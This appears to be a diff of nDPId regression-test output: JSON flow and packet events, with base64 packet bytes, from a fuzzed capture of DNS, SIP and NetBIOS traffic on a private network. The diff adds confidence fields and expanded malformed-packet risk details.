-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1120469663172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469663172,"pkt":"ADBUADRWAODtAW69CABFAABIacgAAIARTYnAqAECwIgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1120469664171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469664171,"pkt":"ADBUADRWAODtAW69CABFAABIackAAIARTYjAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1120469666174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469666174,"pkt":"ADBUADRWAODtAW69CABFAABIacoAAIARpYfAqAECwKgBAQqiADUANFpNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1120469668178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW69CABFAABIacsAAIARTYbAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhADA="}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469672183,"pkt":"ADBUADRWAODtAW7bCABFABFIacwAAIARTYXAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1120469680186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469680186,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqMAR8XBQdaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1120469680188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"ts_msec":1120469680188,"pkt":"ADBUADRWAODtAW69CABFAAHvac4AAIARF3DAqAEC1PIhIxPEE8QB29MsUkVHSVN0RVIgcGlwOnNpcC5jeWJlcmO3dHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4DjEuMjticmFuY2g9ejloRzRiS24lcwAwNTIwMTk5LTQ4OWQ1MjBmMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAw2lwLnB5YmVyY2l0eS5kaz47dGFnPTg2MDJiMTQNClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlGOiA1NzgyMjI3MjktNGs2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDcwIFJFR0lTVEVSDQpDb25mZW50LUxlbmd0aDogMA0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469680447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1120469680447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469680447,"pkt":"ADBUADRWAODtAW69CABFAABIRc8AAIARTYLAqAECwKgBAQqkJXMANFNK1tYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1120469681446,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469681446,"pkt":"ADBUADRWAODtAW69CABFAABIadAAAIARTYHAqAECwKgBAQqkADUANFNK1tYBAAABAAB2AAAABF9zaXAEX3VkcAMlcwAJY3liZXJjaXR5AmRrAAAhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1120469683449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469683449,"pkt":"ADBUADRWAODtAW69CABFAABIYdEAAIARTYDAqAECwKgBAQqkADUANFNK1tYBAAABAAAAAAAABF9zaXAGX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAQE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469685131,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1120469685131,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469685131,"pkt":"\/\/\/\/\/\/\/\/AOB2AW69CABFAABOadMAAIARTHrAqAECwKgB\/wCJY4kAOls4hPQBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUN1NEFDQUJNAHEgAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1120469685452,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469685452,"pkt":"ADBUPzRWAODtAW69CABFAABIadQAAIARTX3AqAECwKgRAQqkADUANFNK1tYBAAABAAAAAAAABF96aXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
